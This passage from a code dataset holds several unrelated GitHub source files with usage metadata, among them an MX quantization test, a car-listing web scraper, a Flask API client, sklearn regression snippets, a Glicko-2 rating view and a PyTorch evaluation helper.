"call"}, {"api_name": "sklearn.metrics.mean_absolute_error", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 150, "usage_type": "name"}]} +{"seq_id": "72077476647", "text": "import pytest\nimport torch\nimport numpy as np\nimport sys\n\nfrom .common_lib import (\n check_diff,\n check_diff_quantize,\n all_encodings\n)\n\nfrom mx.formats import _get_format_params\nfrom mx.mx_ops import _quantize_mx\n\nnp.random.seed(0xd10)\n\nDEVICE__CUSTOM_CUDA = [\n (\"cpu\", False),\n (\"cpu\", True),\n (\"cuda\", True),\n]\n\nELEM_FMTS = [\n (\"fp8_e5m2\"),\n (\"fp8_e4m3\"),\n (\"fp6_e3m2\"),\n (\"fp6_e2m3\"),\n (\"fp4_e2m1\"),\n (\"int4\"),\n]\n\n\n@pytest.mark.parametrize(\"scale_bits\", (8,5))\n@pytest.mark.parametrize(\"elem_format\", ELEM_FMTS)\n@pytest.mark.parametrize(\"block_size\", (8, 9, 64))\n@pytest.mark.parametrize(\"round\", ('nearest', 'floor', 'even'))\n@pytest.mark.parametrize(\"flush_fp32_subnorms\", (False,True))\n@pytest.mark.parametrize(\"device, custom_cuda\", DEVICE__CUSTOM_CUDA)\ndef test_mx_encoding(scale_bits, elem_format, block_size, round,\n flush_fp32_subnorms, device, custom_cuda):\n\n x1 = all_encodings(8, 9, device=\"cpu\")\n x2 = x1.clone().detach().to(device)\n\n y1 = _quantize_mx(x1, scale_bits, elem_format,\n block_size=block_size,\n axes=[-1],\n round=round,\n flush_fp32_subnorms=flush_fp32_subnorms,\n custom_cuda=False)\n\n\n y2 = _quantize_mx(x2, scale_bits, elem_format,\n block_size=block_size,\n axes=[-1],\n round=round,\n flush_fp32_subnorms=flush_fp32_subnorms,\n 
custom_cuda=custom_cuda)\n\n check_diff_quantize(x1, y1, y2)\n", "repo_name": "microsoft/microxcaling", "sub_path": "mx/tests/test_quantize_mx.py", "file_name": "test_quantize_mx.py", "file_ext": "py", "file_size_in_byte": 1607, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 52, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.random.seed", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 15, "usage_type": "attribute"}, {"api_name": "common_lib.all_encodings", "line_number": 42, "usage_type": "call"}, {"api_name": "mx.mx_ops._quantize_mx", "line_number": 45, "usage_type": "call"}, {"api_name": "mx.mx_ops._quantize_mx", "line_number": 53, "usage_type": "call"}, {"api_name": "common_lib.check_diff_quantize", "line_number": 60, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 33, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 34, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 35, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 36, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 37, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 38, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 38, "usage_type": "attribute"}]} +{"seq_id": "15775683815", "text": "from bs4 import BeautifulSoup\nimport requests\n\nurl = 'https://www.mobile.bg/pcgi/mobile.cgi?act=3&slink=rxes3n&f1=1'\nhtml_sc = requests.get(url).text\nsoup = BeautifulSoup(html_sc, 'html5lib')\nmock_budget = 10000\n\ndef year_popper(string):\n basic_nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n for char in string:\n if char not in basic_nums:\n string = string.replace(char, '')\n return int(string[:4])\n\n\ndef price_popper(string):\n basic_nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n for char in string:\n if char not in basic_nums:\n string = string.replace(char, '') \n try:\n return int(string)\n except ValueError:\n return 0 \n\nnum_page = soup.find_all('a', class_ = 'pageNumbers')\npages_links = []\npages_links.append(url)\n\nfor index, i in enumerate(num_page):\n i = num_page[index]['href'] \n i = 'https:' + i\n if i not in pages_links:\n pages_links.append(i)\n\ncounter = 1\n\nfor link in pages_links:\n url = link\n page_url = requests.get(url).text\n page_soup = BeautifulSoup(page_url, 'html5lib')\n all_listings_per_page = page_soup.find_all('table', class_ = 'tablereset', style='width:660px; margin-bottom:0px; border-top:#008FC6 1px solid;')\n page_info = page_soup.find('span', class_ = 'pageNumbersInfo').text\n\n for listing in all_listings_per_page:\n urll = listing.find('td', class_ = 'valgtop', style = 'width:162px;height:40px;padding-left:4px').a\n linkk = 'https:' + urll['href']\n title = urll.text\n price = listing.find('td', class_ = 'algright valgtop', style = 'width:135px;height:40px;padding-left:4px').span.text\n production_year = listing.find('td', style = 'width:440px;height:50px;padding-left:4px').text\n\n price = price_popper(price)\n production_year = 
year_popper(production_year)\n print(\"Listing: \", counter, \" \", production_year, title, price)\n counter+=1\n\n # if E30\n if production_year in range(1982, 1995):\n if price <= mock_budget:\n with open('e30-list.md', 'a') as ff:\n ff.write(f\"Model: {title}\\n\")\n ff.write(f\"Year: {production_year}\\n\")\n ff.write(f\"URL: {linkk}\\n\")\n ff.write(f\"Price: {price}\\n\\n\\n\")\n else:\n with open('dream-car-list.md', 'a') as ff:\n ff.write(f\"Model: {title}\\n\")\n ff.write(f\"Year: {production_year}\\n\")\n ff.write(f\"URL: {linkk}\\n\")\n ff.write(f\"Price: {price}\\n\\n\\n\")\n # if E36 \n elif production_year in range(1996, 2000):\n if '316' in title or '1.6' in title:\n continue\n elif price <= mock_budget:\n with open('e36-list.md', 'a') as ff:\n ff.write(f\"Model: {title}\\n\")\n ff.write(f\"Year: {production_year}\\n\")\n ff.write(f\"URL: {linkk}\\n\")\n ff.write(f\"Price: {price}\\n\\n\\n\")\n else:\n continue\n", "repo_name": "jr94242/bs4-scraper", "sub_path": "mobile-e36.py", "file_name": "mobile-e36.py", "file_ext": "py", "file_size_in_byte": 3126, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 6, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "17858569692", "text": "import requests\nfrom werkzeug.wrappers import response\nfrom flask import session\nfrom . import Schedule_API_URL\n\n\nclass ScheduleClient:\n @staticmethod\n def get_schedules():\n #header = {'Authorization': session['user_api_key']}\n response = requests.get(Schedule_API_URL +\n '/api/schedule/all') #headers=header)\n return response.json()\n\n @staticmethod\n def create_schedule(form):\n #header = {'Authorization': session['user_api_key']}\n payload = {\n 'name': form.name.data,\n 'state': form.state.data,\n 'city': form.city.data,\n 'vaccination_cite': form.vaccination_cite.data,\n 'first_slot': form.first_slot.data,\n 'second_slot': form.second_slot.data,\n 'medical_condition': form.medical_condition.data,\n }\n\n response = requests.post(Schedule_API_URL + '/api/schedule/create',\n data=payload) #headers=header)\n return response.json()\n\n @staticmethod\n def get_schedule_from_session():\n default_schedule = {\n 'items': {}\n }\n return session.get('schedule', default_schedule)\n", "repo_name": "biallenchanuow/CSCI927", "sub_path": "vaccine/frontend/api/schedule_api.py", "file_name": "schedule_api.py", "file_ext": "py", "file_size_in_byte": 1211, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "werkzeug.wrappers.response", "line_number": 11, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "werkzeug.wrappers.response.json", "line_number": 13, "usage_type": "call"}, {"api_name": "werkzeug.wrappers.response", "line_number": 13, "usage_type": "name"}, {"api_name": "werkzeug.wrappers.response", "line_number": 28, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 28, "usage_type": "call"}, {"api_name": "werkzeug.wrappers.response.json", "line_number": 30, "usage_type": "call"}, {"api_name": "werkzeug.wrappers.response", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 37, "usage_type": 
"call"}, {"api_name": "flask.session", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "8758506778", "text": "# Hazır kodlar \r\n\r\n# KARAR AGACI YAPISI \r\n\r\nfrom sklearn.tree import DecisionTreeRegressor\r\ndt = DecisionTreeRegressor(random_state=0)\r\ndt.fit(egitimx,egitimy)\r\n\r\ntahmin = dt .predict(testx)\r\n\r\nprint(\"KARAR AGACI R2 DEGERİ\")\r\nprint(r2_score(testy , tahmin))\r\n\r\n\r\n\r\n#RANDOM FOREST REGRESSİON\r\n\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nrf_reg = RandomForestRegressor(n_estimators=10, random_state=0)\r\nrf_reg.fit(X, y)\r\ntahmin= rf_reg.predict(X)\r\nprint(\"RASSAL ORMAN R2 DEGERİ\")\r\nprint(r2_score(testy,tahmin))\r\n\r\n#POLİNOM REGRESYON\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 2) #degree degeri polinomun kaçıncı dereceden olacagını belirler \r\nx_poly = poly_reg.fit(trainx)\r\npoli = LinearRegression()\r\npoli.fit(x_poly,trainy)\r\ntahmin = poli.predict(poly_reg.fit_transform(testx))\r\nprint(\"POLİNOM REGRESYON R2 DEGERİ\")\r\nprint(r2_score(testy,poli.predict(poly_reg.fit_transform(testx))))\r\n\r\n\r\n#ÇAPRAZ DOGRULAMA \r\n\r\nfrom sklearn.model_selection import cross_val_score\r\n\r\nkvs =cross_val_score(dt, trainx, trainy,cv=5)\r\nprint(\"ÇAPRAZ DOGRULAMA R2 SCORE\")\r\nprint(kvs)\r\nprint(np.mean(kvs))\r\n", "repo_name": "BeytullahArslann/Machine-Learning", "sub_path": "Hazır kodlar.py", "file_name": "Hazır kodlar.py", "file_ext": "py", "file_size_in_byte": 1158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 6, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "70398535847", "text": "import sys, json, argparse\n\nDEBUG = False\n\ndef get_theta(buffers_volumes, buffer_index, _3d_index, O, B):\n T = list()\n Cs = list()\n for dim in range(len(buffers_volumes[buffer_index].p1)):\n if B[dim] < O[dim]:\n C = 0 \n else: \n C = ((_3d_index[dim]+1) * B[dim]) % O[dim]\n # print(f'{((_3d_index[dim]+1) * B[dim])}mod{O[dim]} = {C}')\n if C == 0 and B[dim] != O[dim]: # particular case \n C = O[dim]\n\n if C < 0:\n raise ValueError(\"modulo should not return negative value\")\n\n Cs.append(C)\n T.append(B[dim] - C) \n \n if DEBUG: \n print(f'\\nProcessing buffer {buffer_index}')\n print(f'C: {Cs}')\n print(f'theta: {T}')\n\n return T, Cs\n \n\ndef get_arguments():\n \"\"\" Get arguments from console command.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument('config_filepath', \n action='store', \n type=str, \n help='Path to configuration file containing paths of third parties libraries, projects, data directories, etc. 
See README for more information.')\n return parser.parse_args()\n\n\ndef custom_imports(paths):\n def isempty(s):\n if s == \"\":\n return True \n return False \n\n for k, path in paths.items():\n if \"lib_\" in k and not isempty(path):\n sys.path.insert(0, path)\n\n\nif __name__ == \"__main__\":\n\n args = get_arguments()\n with open(args.config_filepath) as f:\n paths = json.load(f)\n custom_imports(paths)\n\n cases = [\n {\n \"type\": 2,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [650,500,500],\n \"B\": [390,600,700],\n \"volumestokeep\": [1,2,3]\n }, {\n \"type\": 2,\n \"R\": [3900,3000,3500],\n \"I\": [390,300,350],\n \"O\": [650,500,700],\n \"B\": [390,600,700],\n \"volumestokeep\": [1,2,3]\n }, {\n \"type\": 2,\n \"R\": [3900,3000,3500],\n \"I\": [390,300,350],\n \"O\": [325,250,250],\n \"B\": [195,300,350],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [780,3000,700],\n \"B\": [390,3000,700],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [780,3000,3500],\n \"B\": [390,3000,3500],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [3900,3000,3500],\n \"B\": [390,3000,3500],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [3900,3000,3500],\n \"O\": [780,600,700],\n \"B\": [390,3000,3500],\n \"volumestokeep\": [1,2,3]\n }\n ]\n\n import dask_io\n from dask_io.optimizer.utils.utils import numeric_to_3d_pos\n from dask_io.optimizer.cases.resplit_utils import get_named_volumes, get_blocks_shape\n\n import logging\n import logging.config\n logging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': True,\n })\n\n for case in cases:\n _type, R, O, I, B, volumestokeep = int(case[\"type\"]), tuple(case[\"R\"]), tuple(case[\"O\"]), tuple(case[\"I\"]), tuple(case[\"B\"]), case[\"volumestokeep\"]\n print(f'Current run ------ \\nType: {_type}\\nR: {R},\\nO: {O},\\nI: {I}\\nvolumestokeep: {volumestokeep}')\n\n buffers_partition = get_blocks_shape(R, B)\n buffers_volumes = get_named_volumes(buffers_partition, B)\n\n # find omega and theta max\n omega_max = [0,0,0]\n T_max = [0,0,0]\n for buffer_index in buffers_volumes.keys():\n _3d_index = numeric_to_3d_pos(buffer_index, buffers_partition, order='F')\n T, Cs = get_theta(buffers_volumes, buffer_index, _3d_index, O, B)\n\n for i in range(3):\n if Cs[i] > omega_max[i]:\n omega_max[i] = Cs[i]\n if T[i] > T_max[i]:\n T_max[i] = T[i]\n\n print(\"Omega max: \", omega_max)\n\n nb_bytes_per_voxel = 2\n buffersize = B[0]*B[1]*B[2]\n n = R[2]/B[2]\n N = R[1]/B[1] * R[2]/B[2]\n\n i, j, k = 0, 1, 2\n F1 = omega_max[k] * min(B[j],T_max[j]) * min(B[i],T_max[i])\n F2 = T_max[k] * max(0, min(B[j] - T_max[j] , omega_max[j])) * min(B[i], T_max[i])\n F3 = omega_max[k] * max(0, min(B[j] - T_max[j] , omega_max[j] )) * min(B[i] , T_max[i] )\n F4 = T_max[k] * T_max[j] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n F5 = omega_max[k] * T_max[j] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n F6 = T_max[k] * omega_max[1] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n F7 = omega_max[k] * omega_max[j] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n\n print('F1:', F1)\n print('F2:', F2)\n print('F3:', F3)\n print('F4:', F4)\n print('F5:', F5)\n print('F6:', F6)\n print('F7:', F7)\n\n print('buffer size: ', buffersize*nb_bytes_per_voxel/1000000000, \"GB\")\n max_mem = (F1 + n*(F2 + F3) + N*(F4 + F5 + F6 + 
F7) + buffersize) * nb_bytes_per_voxel\n print(\"max_mem: \", max_mem/1000000000, \"GB\")", "repo_name": "GTimothee/dask_io_experiments", "sub_path": "dask_io_experiments/experiment_5/mem_calculator.py", "file_name": "mem_calculator.py", "file_ext": "py", "file_size_in_byte": 5490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.config.dictConfig", "line_number": 123, "usage_type": "call"}, {"api_name": "logging.config", "line_number": 123, "usage_type": "attribute"}, {"api_name": "dask_io.optimizer.cases.resplit_utils.get_blocks_shape", "line_number": 132, "usage_type": "call"}, {"api_name": "dask_io.optimizer.cases.resplit_utils.get_named_volumes", "line_number": 133, "usage_type": "call"}, {"api_name": "dask_io.optimizer.utils.utils.numeric_to_3d_pos", "line_number": 139, "usage_type": "call"}]} +{"seq_id": "25303634227", "text": "import random\nimport math\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, Http404\nfrom facemash.models import FaceMash\n\n\ndef play(request):\n \"\"\" The main-page view of facemash app. \"\"\"\n try:\n contestants = FaceMash.objects.all()\n contestant_1 = random.choice(contestants)\n contestant_2 = random.choice(contestants)\n # A while loop to ensure that the contestants aren't same.\n while contestant_1 == contestant_2:\n contestant_2 = random.choice(contestants)\n args = {'contestant_1': contestant_1, 'contestant_2': contestant_2}\n except IndexError:\n error = True\n args = {'error': error}\n return render(request, 'facemash.html', args) \n\ndef ratings_calculator(request, winner_id, loser_id):\n \"\"\"\n This view is the HEART of facemash app. This is where all the calculations\n for the ratings are done. 
This is where the algorithm is.\n \"\"\"\n try:\n winner = FaceMash.objects.get(id=winner_id)\n loser = FaceMash.objects.get(id=loser_id)\n w = winner\n l = loser\n\n TAU = 0.5 # System constant\n # score = s\n s_w = 1.0\n s_l = 0.0\n # mu\n mu_w = (w.ratings - 1500.0)/173.7178\n mu_l = (l.ratings - 1500.0)/173.7178\n # phi\n phi_w = w.rd/173.7178\n phi_l = l.rd/173.7178\n # g(phi) = g\n g_w = 1.0/math.sqrt(1.0 + 3.0*pow(phi_w, 2)/pow(math.pi, 2))\n g_l = 1.0/math.sqrt(1.0 + 3.0*pow(phi_l, 2)/pow(math.pi, 2))\n # E = E\n E_w = 1.0/(1.0 + math.exp(-g_w*(mu_w - mu_l)))\n E_l = 1.0/(1.0 + math.exp(-g_l*(mu_l - mu_w)))\n # nu\n nu_w = 1.0/(pow(g_l, 2)*E_w*(1 - E_w))\n nu_l = 1.0/(pow(g_w, 2)*E_l*(1 - E_l))\n # delta = delta\n delta_w = nu_w*g_l*(s_w - E_w) # s_w = 1\n delta_l = nu_l*g_w*(s_l - E_l) # s_l = 0\n # a = a\n a_w = math.log(pow(w.sigma, 2), math.e)\n a_l = math.log(pow(l.sigma, 2), math.e)\n\n # f(x) = function_x\n def function_x(x, delta, phi, nu, a):\n \"\"\"\n This function corresponds to f(x) in Glicko-2 Algorithm.\n \"\"\"\n\n e_x = math.exp(x)\n multi = pow(delta, 2) - pow(phi, 2) - nu - math.exp(x)\n divi = 2.0*pow((phi+nu+e_x), 2)\n minus = (x-a)/pow(TAU, 2)\n result = e_x*multi/divi - minus\n return result\n\n EPSILON = 0.000001 # Convergence tolerance\n # Calculate for w (winner).\n A_w = a_w\n if pow(delta_w, 2) > (pow(phi_w, 2) + nu_w):\n B_w = math.log((pow(delta_w, 2) - pow(phi_w, 2) - nu_w), math.e)\n else:\n k = 1\n x = a_w - k*TAU\n f_x = function_x(x, delta_w, phi_w, nu_w, a_w)\n while f_x < 0:\n k += 1\n x = a_w - k*TAU\n function_x(x, delta_w, phi_w, nu_w, a_w)\n B_w = a_w - k*TAU\n\n # find f(A_w)\n f_A_w = function_x(A_w, delta_w, phi_w, nu_w, a_w)\n # find f(B_w)\n f_B_w = function_x(B_w, delta_w, phi_w, nu_w, a_w)\n\n while abs(B_w - A_w) > EPSILON:\n C_w = A_w + (A_w-B_w)*f_A_w/(f_B_w-f_A_w)\n # find f(C_w)\n f_C_w = function_x(C_w, delta_w, phi_w, nu_w, a_w)\n if f_C_w*f_B_w < 0:\n A_w = B_w\n f_A_w = f_B_w\n else:\n f_A_w = f_A_w/2.0\n B_w = C_w\n f_B_w = f_C_w\n # sigmama-dash = sigma_2\n sigma_2_w = math.exp(A_w/2.0)\n # phi-star = p_s\n p_s_w = math.sqrt(pow(phi_w, 2)+pow(sigma_2_w, 2))\n # calculate for l (loser)\n A_l = a_l\n if pow(delta_l, 2) > (pow(phi_l, 2) + nu_l):\n B_l = math.log((pow(delta_l, 2) - pow(phi_l, 2) - nu_l), math.e)\n else:\n k = 1\n x = a_l - k*TAU\n f_x = function_x(x, delta_l, phi_l, nu_l, a_l)\n while f_x < 0:\n k += 1\n x = a_l - k*TAU\n function_x(x, delta_l, phi_l, nu_l, a_l)\n B_l = a_l - k*TAU\n # find f(A_l)\n f_A_l = function_x(A_l, delta_l, phi_l, nu_l, a_l)\n # find f(B_l)\n f_B_l = function_x(B_l, delta_l, phi_l, nu_l, a_l)\n while abs(B_l - A_l) > EPSILON:\n C_l = A_l + (A_l-B_l)*f_A_l/(f_B_l-f_A_l)\n # find f(C_l)\n f_C_l = function_x(C_l, delta_l, phi_l, nu_l, a_l)\n if f_C_l*f_B_l < 0:\n A_l = B_l\n f_A_l = f_B_l\n else:\n f_A_l = f_A_l/2.0\n B_l = C_l\n f_B_l = f_C_l\n # sigmama-dash = sigma_2\n sigma_2_l = math.exp(A_l/2.0)\n # phi-star = p_s\n p_s_l = math.sqrt(pow(phi_l, 2)+pow(sigma_2_l, 2))\n # phi-dash = p_2\n p_2_w = 1.0/math.sqrt(1.0/pow(p_s_w, 2) + 1.0/nu_w)\n p_2_l = 1.0/math.sqrt(1.0/pow(p_s_l, 2) + 1.0/nu_l)\n # mu-dash = u_2\n u_2_w = mu_w + pow(p_s_w, 2)*g_l*(s_w - E_w)\n u_2_l = mu_l + pow(p_s_l, 2)*g_w*(s_l - E_l)\n # convert back to orignial ratings\n w.ratings = 173.7178*u_2_w + 1500\n w.sigma = sigma_2_w\n l.ratings = 173.7178*u_2_l + 1500\n l.sigma = sigma_2_l\n\n # As pointed out by the author of Glicko-2, rd (rating deviation)\n # should not go below 30.\n # Therefore, below make a check for 
that.\n\n w.rd = 173.7178*p_2_w # New rd of winner\n if w.rd < 30:\n w.rd = 30\n l.rd = 173.7178*p_2_l # New rd of loser\n if l.rd < 30:\n l.rd = 30\n # Save the new ratings, rd and volatality for both winner and loser.\n w.save()\n l.save()\n # Redirect back to the Play page\n return HttpResponseRedirect('/facemash/')\n except FaceMash.DoesNotExist:\n raise Http404\n\n\ndef ratings_page(request):\n \"\"\" The ratings-page view. \"\"\"\n\n faces = FaceMash.objects.all().order_by('-ratings')\n return render(request, \"ratings_page.html\", {'faces' : faces})\n\n", "repo_name": "bhch/django-facemash", "sub_path": "facemash/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6048, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "facemash.models.FaceMash.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 11, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 12, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 13, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 16, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects.get", "line_number": 29, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 29, "usage_type": "name"}, {"api_name": "facemash.models.FaceMash.objects.get", "line_number": 30, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 30, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 45, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 45, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 46, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 46, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 48, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 49, "usage_type": "call"}, {"api_name": "math.log", "line_number": 57, "usage_type": "call"}, {"api_name": "math.e", "line_number": 57, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 58, "usage_type": "call"}, {"api_name": "math.e", "line_number": 58, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 66, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 67, "usage_type": "call"}, {"api_name": "math.log", "line_number": 77, "usage_type": "call"}, {"api_name": "math.e", "line_number": 77, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 105, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 107, "usage_type": "call"}, {"api_name": "math.log", "line_number": 111, "usage_type": "call"}, {"api_name": "math.e", "line_number": 111, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 137, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 139, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 141, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 142, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 166, "usage_type": "call"}, 
{"api_name": "facemash.models.FaceMash.DoesNotExist", "line_number": 167, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 167, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 168, "usage_type": "name"}, {"api_name": "facemash.models.FaceMash.objects.all", "line_number": 174, "usage_type": "call"}, {"api_name": "facemash.models.FaceMash.objects", "line_number": 174, "usage_type": "attribute"}, {"api_name": "facemash.models.FaceMash", "line_number": 174, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "29400977666", "text": "import context\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.utils.data\nfrom torch.utils.data import Dataset, DataLoader\n\nfrom typing import Optional, Tuple\n\n\ndef eval_logits_on_dataset(model: nn.Module, dataset: Dataset, batch_size: int = 128,\n device: Optional[torch.device] = None,\n num_workers: int = 4) -> Tuple[torch.tensor, torch.tensor]:\n \"\"\"\n Takes a model and an evaluation dataset, and returns the logits\n output by the model on that dataset as an array\n :param model: torch.nn.Module that outputs model logits\n :param dataset: pytorch dataset with inputs and labels\n :param batch_size: int\n :param device: device to use for evaluation\n :param num_workers: int, num. workers for the data loader\n :return: stacked torch tensor of logits returned by the model\n on that dataset, and the labels\n \"\"\"\n # Set model in eval mode\n model.eval()\n\n testloader = DataLoader(dataset, batch_size=batch_size,\n shuffle=False, num_workers=num_workers)\n logits_list = []\n labels_list = []\n with torch.no_grad():\n for i, data in enumerate(testloader, 0):\n # Get inputs\n inputs, labels = data\n if device is not None:\n inputs, labels = map(lambda x: x.to(device),\n (inputs, labels))\n logits = model(inputs)\n logits_list.append(logits)\n labels_list.append(labels)\n\n logits = torch.cat(logits_list, dim=0)\n labels = torch.cat(labels_list, dim=0)\n return logits.cpu(), labels.cpu()\n", "repo_name": "KaosEngineer/PriorNetworks", "sub_path": "prior_networks/evaluation.py", "file_name": "evaluation.py", "file_ext": "py", "file_size_in_byte": 1657, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 55, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Module", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 13, "usage_type": "attribute"}]} +{"seq_id": "38919389340", "text": "from time import sleep\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\r\nfrom selenium.webdriver.common.by import By\r\n\r\nfrom helpers.file_manager import FileManager\r\nfrom helpers.file_manager import FILE_PATH\r\n\r\nimport csv\r\nimport 
random\r\n\r\nclass UtScrapper():\r\n def __init__(self) -> None:\r\n self.ff_options = FirefoxOptions()\r\n self.ff_options.headless = True\r\n self.driver = webdriver.Firefox(options=self.ff_options)\r\n\r\n self.fm = FileManager()\r\n self.fm.check_file()\r\n\r\n async def scrape_ut(self, weburl):\r\n self.driver.get(weburl)\r\n\r\n try:\r\n existent_elements = list(csv.DictReader(open('./data/ut_scrapper.csv', 'r')))\r\n new_element_list = []\r\n\r\n for e in range(10, 0, -1):\r\n element = self.driver.find_element(By.CSS_SELECTOR, 'div.alert-sm:nth-child({})'.format(e))\r\n e_text = str(element.text).split(' ')\r\n e_title = ''\r\n e_date = e_text[0]\r\n e_link = self.driver.find_element(By.CSS_SELECTOR, 'div.alert-sm:nth-child({}) > strong > a'.format(e)).get_attribute('href')\r\n e_flag = False\r\n \r\n for i in range(1,len(e_text)):\r\n if i == 1:\r\n e_title = e_title + e_text[i]\r\n else:\r\n e_title = e_title + ' ' + e_text[i]\r\n \r\n for row in existent_elements:\r\n if row['title'] == e_title and row['date'] == 